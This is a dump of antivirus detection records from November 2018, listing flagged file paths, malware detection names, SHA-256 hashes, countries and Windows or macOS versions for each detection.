  Row(detection=Row(filename='avscan-20181102-055148-5bcf86a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055148-5BCF86A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052905-2f934d1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052905-2F934D1F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052133-21cbf146', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052133-21CBF146', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050953-80b25553', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050953-80B25553', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061706-e4c6251b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061706-E4C6251B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061817-0ea5d22f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061817-0EA5D22F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053554-22fb8cf5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053554-22FB8CF5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052614-c9b39843', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052614-C9B39843', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053631-38f5088b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053631-38F5088B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062002-4d9e894a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062002-4D9E894A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054003-b766883e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054003-B766883E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060218-d3717ef5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060218-D3717EF5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050421-bab57614', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050421-BAB57614', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060416-19912aa6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060416-19912AA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051228-dd05ef77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051228-DD05EF77', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053735-5f71d7d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053735-5F71D7D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053828-7ecdc072', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053828-7ECDC072', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051942-df92b8d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051942-DF92B8D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051912-ce1ad33e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051912-CE1AD33E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061550-b778280f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061550-B778280F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060932-d63c168a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060932-D63C168A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:36:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000ee50', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0000ee50', filesize=15872000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='83e1260dbb29fff4c1a8f78296e09488f98c621ead5c4f8431b6f0eada3814ec', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:28:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050645-10bde3ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050645-10BDE3EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050812-4489b66b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050812-4489B66B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051451-325f4d72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051451-325F4D72', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062143-89a59ea2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062143-89A59EA2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060750-9905dcbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060750-9905DCBD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062159-930b8f63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062159-930B8F63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062434-efbdeb6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062434-EFBDEB6C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='7bb5a9ef0f10b1afda50492a3bd8db5532529a9a0ddef3fe7437126df65b4ca8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060936-d881efba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060936-D881EFBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062005-4ef702d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062005-4EF702D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060723-894a6c10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060723-894A6C10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:49:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053338-d24b5576', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053338-D24B5576', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062137-864e53d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062137-864E53D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062357-d93ec366', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062357-D93EC366', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalServiceNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:39:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184410-3b6ccb38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab16be44\\AVSCAN-20181101-184303-2E317741\\AVSCAN-20181101-184410-3B6CCB38', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='47cfc01081109c4b441cc109030378b73fb44f74a87e4c4a12295cea35c1d899', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:44:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gsm.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\GSM\\GSM.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='điều 44.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Điều 44.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='1db031dd1b44e54b3a07b549a9b0fae74898207fff1890788a72a5a60857729b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:47:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='license generator.exe', filepath='D:\\civil\\مدني\\Progs\\ETABS 2015\\Crack\\License Generator.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T21:17:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155120-9290a6c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155120-9290A6C3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:47:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:32:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lemburan.pif', filepath='D:\\DATA_SHARE\\dini\\lemburan\\lemburan.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:47:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T13:08:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~pp42ac.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp42AC.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:59:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='p2k3 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\RPG P2K3 2015\\P2K3 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:35:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155524-3c2fd9c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155524-3C2FD9C4', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155521-3bba71f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155521-3BBA71F4', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:04Z'), dt=datetime.date(2018, 11, 1)),
